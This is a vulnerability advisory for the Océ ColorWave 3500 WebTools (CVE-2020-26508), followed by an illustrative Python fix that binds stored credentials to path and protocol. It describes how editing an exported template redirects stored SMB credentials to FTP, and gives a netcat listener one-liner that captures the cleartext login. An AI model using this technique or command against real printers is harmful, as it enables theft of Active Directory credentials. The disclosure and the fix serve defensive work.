Advisory ID:               SYSS-2020-034
Product:                   Océ ColorWave 3500 - WebTools
Manufacturer:              Canon / Océ
Affected Version(s):       5.1.1.0
Tested Version(s):         5.1.1.0
Vulnerability Type:        Insufficiently Protected Credentials (CWE-522)
Risk Level:                Low
Solution Status:           Open
Manufacturer Notification: 2020-09-11
Solution Date:             2020-xx-xx
Public Disclosure:         2020-10-30
CVE Reference:             CVE-2020-26508
Author of Advisory:        Zoellner Matthias, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Océ ColorWave 3500 is a business printer and scanner.

The manufacturer describes the product as follows (see [1]):

"ColorWave 3500 - Rock-solid wide-format printing with unparalleled ease of use"

Due to insufficiently protected credentials, the product is vulnerable to the extraction of stored SMB credentials via cleartext protocols such as FTP.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

To allow scanning directly to an SMB share, it is possible to store Active Directory credentials on the device. These credentials are protected in the web interface of the device via encryption. If parameters of a share, like the path or the protocol, are changed, the printer removes the credentials. To be able to manipulate the settings, it is necessary to be authenticated in the web interface as "PowerUser" or higher.

This protection can be bypassed via the import/export feature, and the credentials can be obtained in cleartext.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

To reproduce, follow these steps:

1. "Export all Location Templates" via the web interface:
   https:///v2/TemplateManager/indexExternalLocation.jsp

2. Open the exportExternalLocationTemplates.zip file and edit the included ExternalLocationTemplates.xml like this:

   a) Original version:

   It is necessary to change the path from \\SMB_Server\Printer to the and the protocol from SMB to FTP.

   b) Edited version:

3. Import the edited .zip file.

4. Open the imported template in the web interface and click "save". This triggers a connection check.

5. The credentials can be received with a fake FTP server or a simple Python snippet:

   $ python -c 'print "220 Welcome!\r\n331 Please specify the password"' | sudo nc -nlvp 21
   listening on [any] 21 ...
   connect to [] from (UNKNOWN) [] 56223
   USER SySS\SMB_User
   PASS SuperS3cure!

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The vendor has not yet released a security update.

A possible fix would be to compute a checksum over the combination of path and credentials and to drop the credentials when that combination has been manipulated.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2020-08-28: Vulnerability discovered
2020-09-11: Vulnerability reported to manufacturer
2020-09-21: Contact retry
2020-10-30: Disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for ColorWave 3500
    https://www.canon.co.uk/business-printers-and-faxes/colorwave-3500/specifications/
[2] SySS Security Advisory SYSS-2020-034
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-034.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Matthias Zoellner of SySS GmbH.
E-Mail: matthias.zoellner@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Matthias_Zoellner.asc
Key Fingerprint: 36CD 6245 CBBF DA3C 14B5 5C33 B6E2 E969 CDB2 BC91

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en
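As an added illustration of the countermeasure proposed in the Solution section (example code, not the device firmware or any SySS code): the stored credential is bound to path, protocol and user with an HMAC under a device-local key, so a template whose path or protocol was edited in the export loses its credential on import instead of sending it to the new destination during the connection check. The XML element names, the device key and the ciphertext blob are assumptions.

```python
import hmac
import hashlib
import xml.etree.ElementTree as ET

# Assumption: a per-device secret that never leaves the device (constructed value).
DEVICE_KEY = b"constructed-device-local-key-never-exported"


def binding_tag(path, protocol, username, enc_credential, key=DEVICE_KEY):
    """HMAC over every field that decides where the credential will be sent.
    Editing the path or the protocol in the export invalidates the tag."""
    msg = "\x00".join([path, protocol, username, enc_credential]).encode("utf-8")
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def export_template(path, protocol, username, enc_credential):
    """Hypothetical export layout; the advisory's real XML is not reproduced here."""
    tpl = ET.Element("ExternalLocationTemplate")
    for tag, val in (("Path", path), ("Protocol", protocol), ("User", username),
                     ("EncryptedCredential", enc_credential)):
        ET.SubElement(tpl, tag).text = val
    ET.SubElement(tpl, "BindingTag").text = binding_tag(
        path, protocol, username, enc_credential)
    return ET.tostring(tpl, encoding="unicode")


def import_template(xml_text, key=DEVICE_KEY):
    """Recompute the tag on import; on mismatch keep the location but drop the
    credential so the connection check cannot send it to a changed destination."""
    root = ET.fromstring(xml_text)
    fields = {t: (root.findtext(t) or "") for t in
              ("Path", "Protocol", "User", "EncryptedCredential", "BindingTag")}
    expected = binding_tag(fields["Path"], fields["Protocol"], fields["User"],
                           fields["EncryptedCredential"], key)
    intact = hmac.compare_digest(fields["BindingTag"], expected)
    if not intact:
        fields["User"] = ""
        fields["EncryptedCredential"] = ""
    fields["credentials_dropped"] = not intact
    return fields


def edit_template(xml_text, **changes):
    """Rewrite fields of an exported template (what step 2 of the PoC does)."""
    root = ET.fromstring(xml_text)
    for tag, val in changes.items():
        root.find(tag).text = val
    return ET.tostring(root, encoding="unicode")
```

An unmodified export round-trips with its credential intact; any edit to the path or protocol makes the imported template credential-less, so the operator has to re-enter the password for the new location.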